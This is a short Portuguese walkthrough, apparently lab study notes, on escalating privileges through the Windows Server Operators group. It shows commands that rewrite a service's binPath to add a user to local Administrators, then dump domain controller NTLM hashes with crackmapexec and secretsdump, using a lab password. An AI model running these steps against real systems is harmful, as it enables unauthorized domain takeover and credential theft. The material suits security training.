Server Operators

O grupo Operadores de Servidor permite que seus membros administrem servidores Windows sem a necessidade de privilégios de Administrador de Domínio.

Trata-se de um grupo com privilégios muito elevados, capaz de acessar servidores localmente, incluindo Controladores de Domínio.

• Consultando o serviço AppReadiness

sc qc AppReadiness

• Verificando permissões de serviço com o PsService

c:\Tools\PsService.exe security AppReadiness

• Verificando a participação no grupo de administradores locais

net localgroup Administrators

• Vamos alterar o caminho do binário para executar um comando que adiciona nosso usuário atual ao grupo de administradores locais padrão.

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Iniciando o serviço

• A inicialização do serviço falha, o que é esperado.

sc start AppReadiness

• Ao verificarmos a composição do grupo de administradores, constatamos que o comando foi executado com sucesso.

net localgroup Administrators

• A partir daqui, temos controle total sobre o Controlador de Domínio e podemos recuperar todas as credenciais do banco de dados NTDS, acessar outros sistemas e executar tarefas de pós-exploração.

crackmapexec smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'

• Recuperando hashes de senha NTLM do controlador de domínio

secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator